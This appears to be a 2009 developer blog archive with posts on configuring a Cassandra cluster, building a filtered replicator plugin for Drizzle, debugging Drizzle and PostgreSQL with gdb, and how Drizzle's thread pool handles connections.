The cassandra.in.sh file can be used to specify JVM options (such as the maximum heap size). Within the cassandra.in.sh file we copied over, various options can be set but we need to remove the following lines (as we have already defined CASSANDRA_CONF):

# The directory where Cassandra's configs live (required)
CASSANDRA_CONF=$cassandra_home/conf

The first configuration file which we modify is the storage-conf.xml file. The main portions which we modify are:

The storage-conf.xml configuration file is well commented and provides ample explanation on the various parameters that can be configured. It is worth reading through that file when you are wondering what can be tweaked in cassandra. Next, we need to configure the logging properties for the system. These properties are specified in the log4j.properties file (again in the $CASSANDRA_CONF directory). The portion to modify is:

# Edit the next line to point to your logs directory
log4j.appender.R.File=/opt/cassandra/logs/system.log

Starting/Stopping Cassandra

First, lets start cassandra on one node in the foreground to ensure that everything is set up correctly. Open 2 terminal windows and in one of them, start cassandra in the foreground:

$ su - cassandra
$ cassandra -f
Listening for transport dt_socket at address: 8888
DEBUG - Loading settings from /opt/cassandra/conf/storage-conf.xml
DEBUG - Syncing log with a period of 1000
DEBUG - opening keyspace Keyspace1
DEBUG - adding Super1 as 0
DEBUG - adding Standard2 as 1
DEBUG - adding Standard1 as 2
DEBUG - adding StandardByUUID1 as 3
DEBUG - adding LocationInfo as 4
DEBUG - adding HintsColumnFamily as 5
DEBUG - opening keyspace system
INFO - Saved Token not found. Using 66210133872783152550171468874444798372
DEBUG - Starting to listen on 127.0.1.1:7001
DEBUG - Binding thrift service to cass01:9160
INFO - Cassandra starting up...

Now, in the other terminal window, use the cassandra command-line interface to connect to the instace we started in our other window:

$ su - cassandra
$ cassandra-cli --host cass01 --port 9160
Connected to cass01/9160
Welcome to cassandra CLI.

Type 'help' or '?' for help. Type 'quit' or 'exit' to quit.
cassandra> help
List of all CLI commands:
?                                                      Same as help.
connect \/                              Connect to Cassandra's thrift service.
describe keyspace                        Describe keyspace.
exit                                                   Exit CLI.
help                                                   Display this help.
quit                                                   Exit CLI.
show config file                                       Display contents of config file
show cluster name                                      Display cluster name.
show keyspaces                                         Show list of keyspaces.
show version                                           Show server version.
get .['']                             Get a slice of columns.
get .['']['']                 Get a column value.
set .[''][''] = ''     Set a column.
cassandra> show version
0.4.0
cassandra> exit
$

The cassandra script provided in the bin directory can be used to start cassandra but I wanted a script that I could use to easily start/stop a cassandra instance. Here is an extremely simple script we can use to start and stop cassandra that I created:

#!/bin/bash
#
# /etc/init.d/cassandra
#
# Startup script for Cassandra
#

export JAVA_HOME=/usr/lib/jvm/java-6-sun
export CASSANDRA_HOME=/opt/cassandra/source/latest
export CASSANDRA_INCLUDE=/opt/cassandra/conf/cassandra.in.sh
export CASSANDRA_CONF=/opt/cassandra/conf
export CASSANDRA_OWNR=cassandra
export PATH=$PATH:$CASSANDRA_HOME/bin
log_file=/opt/cassandra/logs/stdout
pid_file=/opt/cassandra/logs/pid_file

if [ ! -f $CASSANDRA_HOME/bin/cassandra -o ! -d $CASSANDRA_HOME ]
then
    echo "Cassandra startup: cannot start"
    exit 1
fi

case "$1" in
    start)
        # Cassandra startup
        echo -n "Starting Cassandra: "
        su $CASSANDRA_OWNR -c "$CASSANDRA_HOME/bin/cassandra -p $pid_file" > $log_file 2>&1
        echo "OK"
        ;;
    stop)
        # Cassandra shutdown
        echo -n "Shutdown Cassandra: "
        su $CASSANDRA_OWN -c "kill `cat $pid_file`"
        echo "OK"
        ;;
    reload|restart)
        $0 stop
        $0 start
        ;;
    status)
        ;;
    *)
        echo "Usage: `basename $0` start|stop|restart|reload"
        exit 1
esac

exit 0

The above script can be used to ensure that a cassandra service starts and stops automatically on startup/shutdown of our nodes. This might not be what you want but if it is, you would ensure the script is run at startup/shutdown by copying the script to /etc/init.d and doing the following:

$ sudo chmod a+x /etc/init.d/cassandra
$ cd /etc/init.d
$ sudo update-rc.d cassandra defaults 99
update-rc.d: warning: /etc/init.d/cassandra missing LSB information
update-rc.d: see 
 Adding system startup for /etc/init.d/cassandra ...
   /etc/rc0.d/K99cassandra -> ../init.d/cassandra
   /etc/rc1.d/K99cassandra -> ../init.d/cassandra
   /etc/rc6.d/K99cassandra -> ../init.d/cassandra
   /etc/rc2.d/S99cassandra -> ../init.d/cassandra
   /etc/rc3.d/S99cassandra -> ../init.d/cassandra
   /etc/rc4.d/S99cassandra -> ../init.d/cassandra
   /etc/rc5.d/S99cassandra -> ../init.d/cassandra
$

Adding New Nodes

Now that we have 1 node up and running, its time to add more nodes to our cassandra cluster. This is an extremely simple process once the initial node has been set up. Assumming we have performed all the steps listed above on another node (or simply cloned a virtual machine with these steps performed as I am doing), all we need to do is modify the cassandra configuration files on the new nodes. I wish to add 2 new nodes so I will modify the appropriate portion of the storage-conf.xml configuration file to indicate this:

Now, lets start the cass02 node in the foreground to see what happens. We would expect to see some indication in the output that knowledge is gained of the other node (in this case cass01) that is available:

$ cassandra -f
Listening for transport dt_socket at address: 8888
DEBUG - Loading settings from /opt/cassandra/conf/storage-conf.xml
DEBUG - Syncing log with a period of 1000
DEBUG - opening keyspace Keyspace1
DEBUG - adding Super1 as 0
DEBUG - adding Standard2 as 1
DEBUG - adding Standard1 as 2
DEBUG - adding StandardByUUID1 as 3
DEBUG - adding LocationInfo as 4
DEBUG - adding HintsColumnFamily as 5
DEBUG - opening keyspace system
INFO - Saved Token not found. Using 107959976695419204492109802329269912484
DEBUG - Starting to listen on 192.168.221.139:7001
DEBUG - Binding thrift service to cass02:9160
INFO - Cassandra starting up...
INFO - Node 192.168.221.138:7001 has now joined.
DEBUG - CHANGE IN STATE FOR 192.168.221.138:7001 - has token 65882889577194449649405650603559126735

Ok, now lets start the cassandra service up on cass02 properly using the script I showed earlier. Lets monitor the system log on the initial node we set up (cass01) to see what happens:

 
INFO [main] 2009-09-07 02:16:14,851 CassandraDaemon.java (line 142) Cassandra starting up...
INFO [GMFD:1] 2009-09-07 02:17:36,433 Gossiper.java (line 630) Node 192.168.221.139:7001 has now joined.
DEBUG [GMFD:1] 2009-09-07 02:17:36,435 StorageService.java (line 441)
CHANGE IN STATE FOR 192.168.221.139:7001 - has token 107959976695419204492109802329269912484

Next, lets start the cassandra service on another node (cass03) and see what happens in the system logs of the initial node (cass01). Note that the storage-conf.xml file on this new node will require the same modifications as mentioned for the cass02 node (the Seeds directive).

 
INFO [GMFD:1] 2009-09-07 02:18:44,827 Gossiper.java (line 630) Node 192.168.221.140:7001 has now joined.
DEBUG [GMFD:1] 2009-09-07 02:18:44,828 StorageService.java (line 441)
CHANGE IN STATE FOR 192.168.221.140:7001 - has token 27033316431601492526110603272792929694

Next, we will shutdown the cass03 node and monitor the system logs where we will observe the following:

 
INFO [Timer-1] 2009-09-07 02:19:05,960 Gossiper.java (line 234) EndPoint 192.168.221.140:7001 is now dead.

Now, lets start cass03 back up again to see what happens:

 
INFO [GMFD:1] 2009-09-07 02:20:30,737 Gossiper.java (line 630) Node 192.168.221.140:7001 has now joined.
DEBUG [GMFD:1] 2009-09-07 02:20:30,738 StorageService.java (line 441)
CHANGE IN STATE FOR 192.168.221.140:7001 - has token 27033316431601492526110603272792929694
DEBUG [GMFD:1] 2009-09-07 02:20:30,738 StorageService.java (line 465)
Sending hinted data to 192.168.221.140:7000
DEBUG [HINTED-HANDOFF-POOL:1] 2009-09-07 02:20:30,743
HintedHandOffManager.java (line 200) Started hinted handoff for endPoint 192.168.221.140
DEBUG [HINTED-HANDOFF-POOL:1] 2009-09-07 02:20:30,760
HintedHandOffManager.java (line 235) Finished hinted handoff for endpoint 192.168.221.140

Now all 3 nodes are back in the cluster again. We can see how easy it is to add new nodes. We simply need to inform the new node of some other nodes in the cluster (not necessarily all of them due to the gossip-based membership protocol).

Conclusion

The main reason I wrote this post is because I wanted to document my experiences in setting up a small cassandra cluster for future reference. I'm taking a class this semester in distributed systems for fun (since I've satisfied the course requirements for my program) which involves a semester project and one project that I've been toying with in my mind is performing an experimental evaluation of various failure detectors. For example, cassandra uses the phi-accrual failure detector from Hayashibaraet al's paper but there is a multitude of other possible failure detectors that could be used. I'm thinking of implementing and evaluating various failure detectors in real systems such as cassandra and voldemort. It is one possibility for a project that I've thought of (which I have not ran by the professor yet). I've implemented a different failure detector in cassandra already this week but performing an evaluation of a failure detector is not an easy process (what metrics to use to evaluate a failure detector is itself an interesting question). However, if anyone could think of any other interesting project in distributed systems that might allow me to make a contribution to one of these open-source projects, that would be awesome! Anyway, that's all I've got for now. A really good article to read next is this one that goes into some detail on actually using cassandra.

Developing a Replicator Plugin for Drizzle

2009-07-24T00:00:00-07:00

Recently, I started working on a plugin that performs direct to Memcached replication in Drizzle. While working on this, I found that I wanted to be able to filter replication events based on schema or table names. I went ahead and implemented this in my Memcached plugin but then realized that this functionality would be better off as its own plugin as I imagine filtering of replication events will be a pretty common task people will want to perform. This led me to start working on a filtered replicator plugin for Drizzle. Before diving in to the plugin implementation, I should mention that Jay Pipes has previously written in significant detail on the replication architecture in Drizzle. I recommend reading that post from Jay if you are not familiar with replication in Drizzle before proceeding with this post.
Jay is currently working on providing documentation regarding replication in Drizzle and you can track that work on the wiki page he created. Its still a work in progress so if you really want to discover how all this works in Drizzle, I recommend having a look at the source code. Jay's work contains a copious amount of comments and is not difficult to read or understand; I highly recommend it. If you are interested in getting involved with this replication development, I'm sure Jay would be more than happy to get some contributors involved. The best way to get started is to ping the mailing list or one of the developers on #drizzle on FreeNode to indicate your interest.
Development of the Replicator Plugin As with any plugin in Drizzle, there are 3 files that are important for building the plugin:

plugin.ini
plugin.ac
plugin.am

Only the plugin.ini file is mandatory. This file is a standard ini-file that currently contains only one section - [plugin]. For the filtered replicator plugin, the plugin.ini file looked like:

[plugin]
name=filtered_replicator
title=Filtered Replicator
description=A simple filtered replicator which allows a user to filter out
            events based on a schema or table name
load_by_default=yes
sources=filtered_replicator.cc
headers=filtered_replicator.h

More information on the 3 files related to plugins are available on the plugin build system page on the Drizzle wiki. Since the replicator plugin does not depend on any external library, we don't need to worry about the other 2 plugin build files here.
Now, since we are developing a replicator, we need to be aware of the replicator API provided by Drizzle's core kernel. That API is defined in the drizzled/plugin/replicator.h include file. If we look in that file, we find the following class definition:

/**
 * Class which replicates Command messages
 */
class Replicator
{
public:
  Replicator() {}
  virtual ~Replicator() {}
  /**
   * Replicate a Command message to an Applier.
   *
   * @note
   *
   * It is important to note that memory allocation for the
   * supplied pointer is not guaranteed after the completion
   * of this function -- meaning the caller can dispose of the
   * supplied message.  Therefore, replicators and appliers
   * implementing an asynchronous replication system must copy
   * the supplied message to their own controlled memory storage
   * area.
   *
   * @param Command message to be replicated
   */
  virtual void replicate(Applier *in_applier,
                         drizzled::message::Command *to_replicate)= 0;

  /**
   * A replicator plugin should override this with its
   * internal method for determining if it is active or not.
   */
  virtual bool isActive() {return false;}
};

The above was developed by Jay and thanks to his awesome work (with really helpful comments), its pretty easy for us to determine what our replicator plugin needs to do. Basically, all we need to do is inherit from the Replicator class and implement the replicate() and isActive() methods and we have a simple replicator! Thus, we will have the following class:

class FilteredReplicator: public drizzled::plugin::Replicator
{
public:
  FilteredReplicator() {}

  /** Destructor */
  ~FilteredReplicator() {}

  void replicate(drizzled::plugin::Applier *in_applier,
                 drizzled::message::Command *to_replicate);

  /**
   * Returns whether the replicator is active.
   */
  bool isActive();
};

Now, for the moment we want to filter by schema name or table name. Thus, we need a place to store the list of schema and table names to filter. Since this is Drizzle and Drizzle is all about using the STL, we'll go with a std::vector for each of these lists. We are going to assume that the list of schemas and table names to filter by are specified as a comma-separated list so we will need a method to parse a comma-separated list and populate the appropriate vectors. Finally, we will also need methods for determining whether a table name or schema name should be filtered or not. Based on all this, our class definition will now look like:

class FilteredReplicator: public drizzled::plugin::Replicator
{
public:
  FilteredReplicator() {}

  /** Destructor */
  ~FilteredReplicator() {}

  void replicate(drizzled::plugin::Applier *in_applier,
                 drizzled::message::Command *to_replicate);

  /**
   * Returns whether the replicator is active.
   */
  bool isActive();

  /**
   * Populate the vector of schemas to filter from the
   * comma-separated list of schemas given. This method
   * clears the vector first.
   *
   * @param[in] input comma-separated filter to use
   */
  void setSchemaFilter(const std::string &input);

  /**
   * Populate the vector of tables to filter from the
   * comma-separated list of tables given. This method
   * clears the vector first.
   *
   * @param[in] input comma-separated filter to use
   */
  void setTableFilter(const std::string &input);

private:

  /**
   * Given a comma-separated string, parse that string to obtain
   * each entry and add each entry to the supplied vector.
   *
   * @param[in] input a comma-separated string of entries
   * @param[out] filter a std::vector to be populated with the entries
   *                    from the input string
   */
  void populateFilter(const char *input,
                      std::vector &filter);

  /**
   * Search the vector of schemas to filter to determine whether
   * the given schema should be filtered or not. The parameter
   * is obtained from the Command message passed to the replicator.
   *
   * @param[in] schema_name name of schema to search for
   * @return true if the given schema should be filtered; false otherwise
   */
  bool isSchemaFiltered(const std::string &schema_name);

  /**
   * Search the vector of tables to filter to determine whether
   * the given table should be filtered or not. The parameter
   * is obtained from the Command message passed to the replicator.
   *
   * @param[in] table_name name of table to search for
   * @return true if the given table should be filtered; false otherwise
   */
  bool isTableFiltered(const std::string &table_name);

  std::vector schemas_to_filter;
  std::vector tables_to_filter;
};

Now that we have the API for our replicator plugin decided on, lets implement the replicate() function. This will perform the filtering of events. For this plugin, it looks pretty simple (which is a good thing!):

void FilteredReplicator::replicate(drizzled::plugin::Applier *in_applier,
                                   drizzled::message::Command *to_replicate)
{
  /*
   * We first check if this event should be filtered or not...
   */
  if (isSchemaFiltered(to_replicate->schema()) ||
      isTableFiltered(to_replicate->table()))
  {
    return;
  }

  /*
   * We can now simply call the applier's apply() method, passing
   * along the supplied command.
   */
  in_applier->apply(to_replicate);
}

Our method for checking whether a schema should be filtered or not simply uses the STL. For completeness, that method looks as follows:

bool FilteredReplicator::isSchemaFiltered(const string &schema_name)
{
  vector::iterator it= find(schemas_to_filter.begin(),
                            schemas_to_filter.end(),
                            schema_name);
  if (it != schemas_to_filter.end())
  {
    return true;
  }
  return false;
}

There is not much more to it than that! As you can see, developing a replicator plugin does not have to be very difficult. Thanks to Jay's awesome work, it is actually fun! I am really enjoying working on my memcached applier at the moment (so much so that I probably spend too much time thinking about it when I should be working on other things...)
System Variables in a Plugin The handling of system variables in a Drizzle plugin is not very pretty at the moment. Thankfully, Monty is working on refactoring system variables in Drizzle. You can read more about that work on the wiki page Monty created. However, for now, we are stuck with the old system. I'm going to describe what I needed to do for one system variable that specifies which schemas we should filter when filtering replication events. The system variable declaration looks as follows:

static DRIZZLE_SYSVAR_STR(filteredschemas,
                          sysvar_filtered_replicator_sch_filters,
                          PLUGIN_VAR_OPCMDARG,
                          N_("List of schemas to filter"),
                          check_filtered_schemas, /* check func */
                          set_filtered_schemas, /* update func */
                          NULL /* default */);

You can see that we specified 2 callback functions: check_filtered_schemas() and set_filtered_schemas(). These are both called when a SET command is executed on this system variable. The check_filtered_schemas() function can be used to make sure that the input is well-formed (I don't really check for that at the moment). For the moment, the check_filtered_schemas() function just copies the input string to a temporary string. Here is the code for that function (the temporary string and mutex are declared as global variables):

static int check_filtered_schemas(Session *,
                                  struct st_mysql_sys_var *,
                                  void *,
                                  struct st_mysql_value *value)
{
  char buff[STRING_BUFFER_USUAL_SIZE];
  int len= sizeof(buff);
  const char *input= value->val_str(value, buff, &len);

  if (input && filtered_replicator)
  {
    pthread_mutex_init(&sysvar_sch_lock, NULL);
    pthread_mutex_lock(&sysvar_sch_lock);
    tmp_sch_filter_string= new(std::nothrow) string(input);
    if (tmp_sch_filter_string == NULL)
    {
      pthread_mutex_unlock(&sysvar_sch_lock);
      pthread_mutex_destroy(&sysvar_sch_lock);
      return 1;
    }
    return 0;
  }
  return 1;
}

Next, we need a function to actually update the system variable. This function looks like so:

static void set_filtered_schemas(Session *,
                                 struct st_mysql_sys_var *,
                                 void *var_ptr,
                                 const void *save)
{
  if (filtered_replicator)
  {
    if (*(bool *)save != true)
    {
      filtered_replicator->setSchemaFilter(*tmp_sch_filter_string);
      /* update the value of the system variable */
      *(const char **) var_ptr= tmp_sch_filter_string->c_str();
      /* we don't need this temporary string anymore */
      delete tmp_sch_filter_string;
      pthread_mutex_unlock(&sysvar_sch_lock);
      pthread_mutex_destroy(&sysvar_sch_lock);
    }
  }
}

You can see that having system variables in a plugin that can be updated is a little bit tricky right now in Drizzle. I wouldn't spend too much time worrying about this at the moment though. Like I said, once Monty finishes his system variable refactoring, we won't have to write such ugly and hard to understand code again. I am definitely looking forward to using the refactored system variables in Drizzle!
Using the Plugin My branch with the filtered replicator plugin I developed is available on Launchpad. You can build it by pulling the branch from Launchpad:

$ cd dir/to/place/branch
$ bzr branch lp:~posulliv/drizzle/filtered-replicator
$ cd filtered-replicator
$ ./config/autorun.sh && ./configure && make

After compiling the branch, we can start playing with it. First thing we need to do is to start Drizzle. That can be accomplished easily:

$ cd /dir/with/replicator/branch
$ mkdir run
$ cd run
$ ../drizzled/drizzled --no-defaults --port=9306 \
--basedir=$PWD --datadir=$PWD \
--filtered-replicator-enable --filtered-replicator-filteredschemas='one,two' \
>> $PWD/drizzle.err 2>&1 &

The above command will start drizzled along with the filtered replicator. One of the system variables associated with this replicator is which schemas to filter replication events by. It is possible to specify these when starting the server (as well as tables to filter replication events by). You will notice that we have not enabled any applier of replication events. What does this mean? Well, it means that nothing is being done with the events that are happening! Sure, I have a replicator running that filters events based on what I specify but nothing is done with these events! I'm currently working on a Memcached applier that takes events and pushes them to a Memcached server to maintain a proactive cache but that is the topic of another blog post.
Now that we have the server up and running, lets see what system variables there are related to our replicator plugin (below, we are assuming the server is still running):

$ cd /dir/with/replicator/branch
$ cd run
$ ../client/drizzle --port=9306
Welcome to the Drizzle client..  Commands end with ; or \g.
Your Drizzle connection id is 2
Server version: 2009.07.1067 Source distribution (filtered-replicator)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

drizzle> show variables like '%replicat%';
+-------------------------------------+--------------+
| Variable_name                       | Value        |
+-------------------------------------+--------------+
| default_replicator_enable           | OFF          |
| filtered_replicator_enable          | ON           |
| filtered_replicator_filteredschemas | first,second |
| filtered_replicator_filteredtables  |              |
| innodb_replication_delay            | 0            |
+-------------------------------------+--------------+
5 rows in set (0 sec)

drizzle>

Lets modify the schemas we are filtering replication by (after showing the actual code that performs this, we might as well do it!):

drizzle> set global filtered_replicator_filteredschemas = 'third,fourth';
Query OK, 0 rows affected (0 sec)

drizzle> show variables like '%replicat%';
+-------------------------------------+--------------+
| Variable_name                       | Value        |
+-------------------------------------+--------------+
| default_replicator_enable           | OFF          |
| filtered_replicator_enable          | ON           |
| filtered_replicator_filteredschemas | third,fourth |
| filtered_replicator_filteredtables  |              |
| innodb_replication_delay            | 0            |
+-------------------------------------+--------------+
5 rows in set (0 sec)

drizzle>

Conclusion This plugin is still under development and I'd love any input from people. What I'd really like to know is what kind of filters would people like to be able to specify? How flexible would people want a filtered replicator to be? Right now, its only possible to filter by schema or table name but I could easily add more options if I thought they would be useful to people.

Summer of Code Progress

2009-07-14T00:00:00-07:00

Since we are around the half-way point in Google's Summer of Code, I thought I'd post a quick update on how things are going so far.
Right now, INFORMATION_SCHEMA is nearly a full plugin in Drizzle. The final patch which finishes the extraction of I_S into a plugin has been proposed for merging and I'm still waiting for that to get pushed to trunk. Once that happens, I will be able to get started on modifying the implementation of the various I_S tables. All in all, its going pretty well. Its extremely satisfying to have patches accepted and placed straight into the codebase of the project that you are working on. I believe this is due to the fact that I am extremely lucky to be working on a project such as Drizzle with an awesome community. Unfortunately, I know that some SoC projects never get utilized which seems to me like a bit of a waste to me.
To keep myself busy while waiting for patches to get merged, I decided to port the memcached UDF's to Drizzle. This has pretty much been completed save for a few UDF's that still need to be ported over. I added a test suite for the plugin tonight and am hoping to get it merged in the next week or two. A project that I'm just getting started with is creating a replication plugin for Drizzle that would send events to a memcached server. I'm hoping to get a simple prototype working in the next week or so and will then look for feedback from the community on it.
I've been pretty busy this summer and so have not had much time for posting. I would like to say that will improve in the future but its unlikely!

Debugging Drizzle with GDB

2009-05-21T00:00:00-07:00

While working with Drizzle this week for my GSoC project, I've been going through the source code to understand how INFORMATION_SCHEMA is currently implemented. Reading through the source code is obviously the best way to understand the logic behind the current I_S implementation but using a debugger to step through the execution of this code can be extremely helpful in speeding up this process. Toru previously published a related post on debugging Drizzle with gdb which may also be useful.
As Toru mentioned in his post, attaching gdb to Drizzle can be quite simple:

The above commands will open a xterm window with a gdb session started that is attached to the Drizzle server process. While this works fine, sometimes I am working on a remote machine and don't want to go to the hassle of setting up something like X11 forwarding or VNC to attach gdb to the server process. Also, while going through the I_S related code, I wanted to step through the code which occurs on server startup i.e. the things which happen before the xterm window with gdb opens as outlined above.
Thus, I wrote the following simple script that I use to debug Drizzle with gdb.

This script takes as an argument the path to the root of a Drizzle build directory. It then simply checks to see if Drizzle is running already or not. If it is already running, it will attach gdb to the Drizzle process in the current terminal window, for example:

If Drizzle is not already running, the script starts gdb so we can then kick Drizzle off ourselves within gdb and debug the server startup, for example:

That's about all I have for this post. As you can see, attaching gdb to Drizzle is a pretty straightforward process. I like to use my script mainly on remote servers but I also find it useful when I want to debug server startup on my local box too.

Attaching gdb To PostgreSQL

2009-05-03T00:00:00-07:00

This semester I've been doing a project with PostgreSQL and I needed to attach a debugger to PostgreSQL on numerous occasions to see what was going on. Since I didn't find much documentation on how to accomplish this, I thought I'd document it here for myself so I can refer to it in the future.
First off, since we want to attach a debugger to a program, we should make sure that program is compiled with debugging information. WIth Postgres, we can easily do that by passing it as an option to the configure script in the top level of the Postgres source code. Thus, I run configure as follows:

Now we can just build the source and install as per usual. Enabling asserts was a good idea for me in my situation as it turns on many sanity checks which were useful for my purposes. Next, we start up the Postgres server and create a database if necessary. Once that is done, clients can connect to the database. So I go ahead and start a session using the psql command line utility and connect to my newly created database.
Once a client was connected, I was able to run the following script in another terminal to find and attach to the Postgres process that was serving my session (this script is very much based on something that Tom Lane posted to the pg-hackers mailing list some time ago):

If no session is currently connected to Postgres, this script does nothing and silently exits. However, if a session is open, then gdb will attach to the Postgres server process serving that session. Here is an example output from when I ran it:

I ran a query in another terminal which triggered the breakpoint that I set in my debugger. The script I have provided does not work very elegantly if there are multiple clients connected to Postgres. It just lists out the process ID's of the various clients. For example, if 2 clients are connected to Postgres, we would get:

We could then manually use gdb to attach to the process that we are interested in. We can find out which process it is that we want to connect to from within our client's session as so:

Now we see that this session corresponds to process 16588. We can simply attach gdb to this process as is done in the above shell script.
During the semester, this script worked fine for me as I never had to worry about multiple clients being connected at the same time. I was only ever dealing with 1 client connected to the server at a time so the above script served my purposes perfectly.
Note that the above process won't work if you want to debug part of the backend startup sequence. If you are interested in doing this, a very brief explanation is given on the PostgreSQL developers FAQ. I have not tried this and don't know how realiable or easy this is to do.

Google Summer of Code

2009-04-21T00:00:00-07:00

Yesterday, I found out that my proposal for Google's Summer of Code was accepted. This means I'll be getting paid to work full-time on Drizzle during the summer! I'll write a longer post on my actual project soon and I'll be updating this blog much more regularly during the summer with updates on my project.
This week I'm at the MySQL user's conference in Santa Clara where there are lots of interesting talks.

MySQL User Conference

2009-04-14T00:00:00-07:00

This year, I'm lucky enough to be going to the MySQL User Conference in Santa Clara. I've decided on the tutorials I'll be attending:

I know a bit about Memcached (such as when it might be useful) but have never used it in practice as I've never had the opportunity so I'm looking forward to learning a bit more about Memcached. The second tutorial should also be pretty interesting and I'm looking forward to hearing some interesting scaling techniques which I might not have known about before.
As for the sessions during the remainder of the week, I know I'll be attending all the ones being put on by various Drizzle developers, such as Brian's session on Drizzle, Stewart's session on memory management in MySQL/Drizzle, Eric's session on libdrizzle, and Monty's session on SQL called 'SQL is dead' (I'm pretty interested to hear what Monty has to say for that session!). I'm also planning on attending a few Ruby/Rails related sessions; I'm very interested in a session on ActiveRecord. There are a few sessions going on at the same time that I'm in two minds about at the moment. I'm thinking that I'll just make my mind up on the day about which one I will attend.
Of all the keynote speakers, the one I most looking forward to hearing is Andy Bechtolsheim's. Also, I'll be at the Drizzle developer day on the Friday at Sun and am looking forward to meeting all of the Drizzle team.

Connection Handling in Drizzle

2009-03-07T00:00:00-08:00

A few weeks ago I was reading the paper Anatomy of a Database System by Hellerstein and Stonebraker. Chapter 2 of that paper discusses process models in database systems. After reading that paper, I was interested in seeing what Drizzle does in this regard so I began looking at the source code to see. Essentially, Drizzle uses the thread per DBMS worker model that is outlined in the paper where a single multi-threaded process hosts all the DBMS worker activity. Drizzle also has the concept of a pool of threads where workers are miltiplexed over a thread pool. The really nice thing about Drizzle in this regard is that the code for implementing the pool of threads is a plugin so if anyone is interested in writing their own thread scheduler, they can simply write a plugin for it. While developing an efficient scheduler might be a challenge, the mechanism for writing a plugin is pretty easy. I think that's pretty cool.
Let's discuss how a client connectection is made to Drizzle and a query is executed. I'll provide a general overview first and then delve into more details. When the Drizzle server is started, a pool of threads is created. The intial MySQL worklog for the implementation of the thread pool mechanism can be found here. The number of threads in this pool can be specified by an administrator. The pthreads API is used for the creation of threads in Drizzle. The thread pool code also utilizes the libevent API which provides a mechanism to execute a callback function when a specific event occurs on a file descriptor. During the initialization of the thread pool, 2 callback functions are registered with libevent. These callback functions are to be executed whenever a session is added or killed. Each thread created during the thread pool initialization process has a thread body which waits for a session to process using libevent. When a new connection comes in, the thread pool code adds it to a queue for libevent processing. When a libevent callback function is invoked (more information about how and when this happens below), a session is removed from the queue and placed in one of two lists depending on the current state of the session - if the session is waiting for I/O it will be added a list indicating that; otherwise, if it is ready for processing, it will be added to a list indicating this. The body of each thread creating during the thread pool initialization is continuously running a loop which looks at the list of sessions that need processing. Whenever a session is added to that list, a thread will pop it from the list and process it. This thread will then go ahead and actually execute the command which the session wants to execute.
Now, lets delve just a little bit further into how client connections are made based on the short summary given in the previous paragraph. I'll reference relevant files and methods in the Drizzle Doxygen docs as I go along when possible. The first thing we'll look at is the main() method of the server which is executed when the server starts. This method is contained in drizzled.cc. After initializing various things, the handle_connections_sockets() method is called. This method is also in the drizzled.cc file and its purpose is to handle new connections and spawn new threads to handle them. This method contains a while loop which continuously executes during the lifetime of the server waiting for new connections to come in to the server. Within this loop, a poll() system call is performed. The poll() system call waits for an event on a file descriptor to occur. In this case, the event will be a new connection. When a new connection comes in, accept() is called to accept a connection on a socket and create a new connected socket. In the drizzled.cc file, this new socket is called new_sock (funnily enough!). Once error checking on the new socket is complete, a new Session object is allocated. If this allocation fails, then the server has reached a limit on the number of sessions that can occur. If no error occurs then the new Session object is passed as a parameter to the create_new_thread() method (also in the drizzled.cc file).
The create_new_thread() method creates a new thread to handle the incoming connection. It is in this method that control actually enters the thread pool code. This occurs when the thread_scheduler.add_connection() method is called. thread_scheduler is a struct of type scheduling_st that defines the interface the scheduler plugin. When add_connection() is called on the thread_scheduler struct it calls the add_connection() function in whichever scheduler plugin is currently loaded. Since we are talking about the thread pool plugin, it will call the add_connection() function in the pool_of_threads.cc file. The add_connection() method notifies the thread pool about a new connection. A new session_scheduler object is created for that new connection. The session_scheduler class is defined in the session_scheduler.h file. This scheduler is set as the scheduler for the Session object that was passed as a parameter to the create_new_thread() method. Next, the libevent_session_add() method is called with the Session object passed as a parameter.
The libevent_session_add() method adds the Session object to a queue for libevent processing. It signals libevent by writing a byte into the session_add pipe which will trigger the callback function libevent_add_session_callback(). This callback function pops the first Session object off the queue of objects waiting for libevent processing and adds the Session object to one of two lists: 1) sessions_need_processing or 2) sessions_waiting_for_io. Which list the Session object is added to depends on the current state of the session. Once the libevent_add_session_callback() function completes, the adding of a new connection to the pool of threads is essentially complete. A session is chosen to be executed within the body of a thread runnning in the pool of threads. Each thread in the pool of threads is running with an outer loop that is defined in the libevent_thread_proc() method. Essentially, each thread in the pool of threads is running an infinite loop that examines the session_need_processing list. When the sessions_need_processing list becomes non-empty, a thread will pop the first Session object from that list and actually go ahead and process a query in that session.
The above description is not meant to be exhaustive. Actually reading through the pool of threads code is not that difficult and a grasp of what the code is doing can be easily obtained in a short period of time. I mostly wrote this for my own purposes so I had a better understanding of how it works.
While the thread pool code works well, it is not without issues. Mark Callaghan points out that when using the thread pool model in MySQL, every command sent to the server requires a pthread mutex lock/unlock pair on LOCK_event_loop. He has also logged a bug for this. Brian Aker responded to Mark's comments by saying that to get rid of this lock, you essentially need to write your own solution. This is much easier to attempt with Drizzle due to its plugin architecture that I mentioned at the beginning of this post. As he says "We have abstracted out this problem now so you can focus on solving this problem if you want". I believe that the idea is that people can write/tune thread schedulers for their own workload since a generic scheduler will not work well for every workload. With this approach, people can easily write a scheduler which is uniquely suited to their workload.
When it comes to the thread pool code, Brian also points out that the current design does not use libevent in the most optimal manner. He says "When it comes to pool of threads I think the current design misses the point of using libevent. Currently it does not yield on IO block, so in essence all it is doing it keeping you from overwhelming the operating system's scheduler and providing a completion for a given action. For small queries this is fine, but for longer running queries this is not very good (though... most queries we see are pretty short so this part is not a huge concern). It needs to be redesigned to make better use of IO, and this is something we will work on soon". Its interesting to see how memcached uses libevent as an example of seeing how another multi-threaded application uses libevent. Steven Grimm gives a brief outline in this thread of how he implemented thread support in memcached. I know Brian is currently working on a multi-threaded scheduler for Drizzle which is almost complete. He has mentioned in the past that there is a need to design a scheduler which really understands the difference between high/low and time constrained queries. I believe this is an interesting issue to think about.
In future posts, I hope to investigate the thread pool code more. In particular, I'd like to see how libevent could be used in a more optimal way and talk about some of the design considerations for a cost-based scheduler. Also, if I have time, I hope to write about how a query is processed in Drizzle i.e. what happens after connection handling.

Semester Project

2009-02-20T00:00:00-08:00

This semester I’m taking a course in database management systems. For this course, we have to work on a mini-research project in groups. I’m in a group with 2 other students and the project we decided on was to perform an experimental evaluation of the mJoin operator. This will involve surveying the prior work on the mJoin operator and performing an implementation of the operator in an open-source DBMS.

